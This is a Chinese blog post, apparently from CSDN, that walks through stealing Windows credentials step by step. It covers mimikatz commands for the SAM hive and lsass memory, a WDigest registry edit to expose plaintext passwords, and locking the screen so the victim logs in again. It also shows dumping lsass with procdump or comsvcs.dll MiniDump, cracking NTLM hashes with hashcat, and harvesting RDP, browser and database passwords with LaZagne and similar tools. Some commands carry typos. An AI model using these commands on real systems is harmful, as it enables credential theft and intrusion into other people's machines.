Windows抓取密码的四种方式&&其他各类密码抓取

于 2024-03-22 01:11:25 发布
阅读量1k 收藏 14
点赞数 20
文章标签: 密码抓取
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huohaowen/article/details/136892015
版权

对于Windows(不是域环境)我们有四种方法去抓取它的密码

  1. 在线读取SAM文件
  2. 离线读取SAM文件
  3. 在线读取Lsass进程
  4. 离线读取Lsass进程

在这次的blog,我们还是用的mimkatz

目录

1.在线读取SAM文件

2.离线读取sam文件

3.在线读取lsass进程

4.离线读取lsass进程

1.任务管理器DUMP

2.通过procdump工具进行dump

3.Power_sploit的Out_minidump的脚本

4.白名单文件 comsvcs.dll

破解lsass.dmp

5.Hashcat 

6.RDP凭证抓取

1.通过cmd读取

2.文件夹读取

7.浏览器,数据库密码信息读取 

1.BrowserGhost

2.Sharp-HackBrowserData

3.数据库密码抓取

4.抓取各类密码 LaZagne

 

1.在线读取SAM文件

这个就是最简单的一个做法,直接在mimikatz上面敲上这个的命令

privilege::debug
token::elebvate
lsadump::sam

这个是没有问题的,只不过它只能读取到NTLM hash

2.离线读取sam文件

因为我们直接在目标机器上面读取hash可能会报毒(本身运行mimikatz也会报毒)所以我们就可以离线读取,其实就是将它的注册表中的sam导出

reg save hklm\sam sam.hive
reg save hklm\system system.hive

就可以看见这两个文件 

然后就是用本地的Mimikatz去导出

lsadump::sam /sam:sam.hive /system:system.hive

也是能达到相应的效果的!!!! 

3.在线读取lsass进程

这个呢,在某一些win10可以,但是在win11是不行的!!!(最起码我的不行)

lsass进程中,存储的是用户的明文密码,所以可能这就是导不出来的原因

privilege::debug
sekurlsa::logonpasswords

win11是会直接报这样的错的(版本什么的我也试过了,而且我已经是重新将密码写回到了注册表) 

但是对于某些win10,以及win server2012 xp 等低版本是可以的

顺便提一嘴,在一些win10版本

首先肯定是要写入计划表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

如果你想获取明文密码可以直接用以下命令 

rundll32.exe user32.dll,LockWorkStation   //这个可以直接锁屏


或者以下方式


query user                    //得到当前用户得id
Logff id              //这个也可以锁屏

都能把用户踢下线 ,当他再输密码得时候,我们就可以读取lsass进程得明文密码

 

4.离线读取lsass进程

离线读取lsass进程,其实就是想办法直接把对应得文件dump出来

1.任务管理器DUMP

前提是你得能远程到别人得电脑,然后直接在任务管理器能把他dump出来

然后你就能得到这样的文件

2.通过procdump工具进行dump

ProcDump 是一个命令行实用工具,其主要用途是监视应用程序的 CPU 峰值,并在出现峰值期间生成故障转储,管理员或开发人员可以使用这些转储来确定出现峰值的原因。 ProcDump 还支持挂起窗口监视(使用与 Windows 和任务管理器使用的窗口挂起相同的定义)、未处理的异常监视,并且可以根据系统性能计数器的值生成转储。 它还可用作可嵌入到其他脚本中的常规进程转储实用工具。

这个是微软自己写的工具,一般不会报毒(360不是一般的软件)

procdump.exe -accepteula ma sass.exe lsass.dmp

3.Power_sploit的Out_minidump的脚本

通过这个脚本是可以dump出明文hash的

但是可以能对win11不太友好,反正我是不行

4.白名单文件 comsvcs.dll

通过调用这个文件的api,可以帮我们导出lsass进程

tasklist | findstr "lsass.exe"   //查找lsass进程的pid
powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump "lsass.exe的PID" C:\lsass.dmp full"

这样我们就可以在c盘下看见一个lsass.dmp的文件啦

破解lsass.dmp

这个是可以用mimkatz去进行破解的!!

privilege::debug
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

对于一些winserver 就算是2012以后的也是可以的 

但是win11还是不行(我真是无语了)

5.Hashcat 

这个可以跑多种的密码包括ntlmhash

假如我们现在有这样的一个ntlm hash

e25bbe456dd96a635f4434511788e502

然后用hashcat

hashcat.exe -m ntlm_hash "字典" --force

可以看见是能跑出来的

6.RDP凭证抓取

1.通过cmd读取

如果我们进入内网之后,我们可以信息收集的时候先敲上这样的一条命令

keycmd /list

如果在这台电脑上登录过其他的电脑,而且还勾选了记住我的凭证就会出现以下结果

2.文件夹读取

敲上这样的一个命令

dir /a %userprofile%\appdata\local\microsoft\credentials\*

这里放着的都是它的登录记录 

解密的话,可以用mimikatz进行解密

7.浏览器,数据库密码信息读取 

1.BrowserGhost

这个就直接运行就好,不过只能抓chrome的(我没用chrome)

2.Sharp-HackBrowserData

这个用的比较多,可以直接抓取你的浏览器得密码

Sharp-HackBrowserData.exe   //直接运行就好

是真的可以抓到,他会生成在result文件夹里面

3.数据库密码抓取

直接运行这个文件

SharpDecryptPwd.exe  -NavicatCrypto

后面就是你的参数了 

4.抓取各类密码 LaZagne

这个工具就比较强大了,基本上可以抓很多东西

lazagne.exe all

这是win11得 

在win server 2012中我是dump出了它的ntlm 和lm hash 

[email protected]
关注
  • 20
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mimikatz Windows 密码抓取神器
05-27
Mimikatz Windows 密码抓取神器
抓取密码工具
08-13
mimikatz最近发布了它的2.0版本,抓密码命令更加简单了,估计作者也看到了对它这个神器最多的研究就是直接抓密码,为神马不发布一个直接一键版,哈哈哈哈哈。新功能还包括能够通过获取的kerberos登录凭据,绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP)的登陆认证。建议默认禁止RestrictedAdmin模式登录。
内网密码抓取
jjjj1029056414的博客
11-13 495
主要抓的内网机器hash明文密码这些
轻松获取密码
01-25
运行后显示隐藏的密码
windows7电脑SAM文件[参照使用]
12-04
从电脑里面"挖"出来的,经修改后的,属于纯原版,大家下载当参照物就行了
windows密码获取
07-29 2206
概述 渗透测试过程中对于windows 系统中的密码获取是十分重要的一步,获取密码后我们可以对内网中其他机器进行撞库,快速、批量拿下其他服务器权限。 windows密码获取方法 最主流的获取windows 密码的方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。 使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。 mimikatz直接获取 直接将mimikatz 上传到
几款优秀的Windows密码抓取工具
LuckySec
03-24 6429
前言 本篇介绍几款优秀的Windows上的密码抓取工具,每个工具都有自己的特点非常实用,欢迎补充。 0x01 Mimikatz 个人点评:这款工具非常强大,公认的Windows密码神器。 1. 简介 Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。mimikatz还可以执行哈希传递,票证传递或构建Golden票证 项目地址:https://github.com/gentilkiwi/mimikatz/ 2. 使用 cmd运行
Windows密码哈希值获取工具
AI
06-07 1153
mimikatz是法国人Benjamin开发的一款功能强大的轻量级调试工具,本意是用来进行个人测试的,但由于其功能强大,能够直接读取Windows操作系统的明文密码,因而闻名于渗透测试领域,可以说是渗透必备工具。这些功能在内网渗透中能够被利用,例如在Windows平台上执行绕过Hash或从内存中获取NT/LM hashes(也可以从交互式登录、服务、远程桌面连接中获取 ),以用于进一步的攻击,而且它的体积也非常小,是内网渗透必备工具。通过下载或直接执行该ps脚本即可获取Windows密码
Windows密码破解
weixin_51846555的博客
07-03 2781
这里主要介绍两种方法来破解Windows的开机密码
Windows账号和密码的获取与破解 相关工具集合
大河之犬的博客
09-19 1755
在通过SQL注入等方式获取网站的WebShell后,就可以利用系统的各种漏洞进行提权,提权成功后,就可以通过远程终端登录系统。此时,为了长期控制或者进一步渗透网络,攻击者需要获取系统正常用户的密码在大多数情况下,都需要对系统账号和密码Hash值进行获取。常见的密码获取软件有GetHashes、gsecdump、PwDump、SAMInside等,常用的密码破解软件有LC5/LC6、SAMInside、Ophcrack、Hashcates等。
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
国外的windows密码获取工具
09-05
直接运行exe可获得命令 --output 路径+文件名可以导出数据。
获取windows 密码工具
06-23
windows下运行就可以看到当前所有用户的密码,实在是系统维护的好东西,请不要用于非法的目的啦
如何获取网页密码框中的密码
12-25
如何获取网页密码框中的密码,如何获取网页密码框中的密码
hash密码抓取工具大全
03-25
hash密码抓取提取密码工具大全
Windows密码散列抓取原理
04-07
由boywhp先生整理成文,简要分析了Pwdump和ophc等工具抓取windows密码散列的原理.阐述了散列抓取过程、关键函数、解密还原过程等重点代码片段,只要有一定编程基础的都可照此马上把工具写出来。
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
第五次作业函数第一题代码
最新发布
05-01
第五次作业函数第一题--
使用L0phtCrack获取密码和使用mimikatz直接抓取Windows明文密码区别总结
03-22
L0phtCrack和mimikatz都是用于获取Windows系统密码工具,但它们的工作原理不同。L0phtCrack是一款密码破解软件,它通过暴力破解、字典攻击等方式获取密码。而mimikatz则是一款密码抓取工具,它可以直接从Windows系统内存中获取明文密码。因此,L0phtCrack获取的密码可能需要一定的时间才能破解成功,而mimikatz则可以直接获取明文密码,速度更快。另外,使用L0phtCrack需要对密码进行破解,可能会被系统检测到并触发安全警报,而使用mimikatz则可以在不留下痕迹的情况下获取密码

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值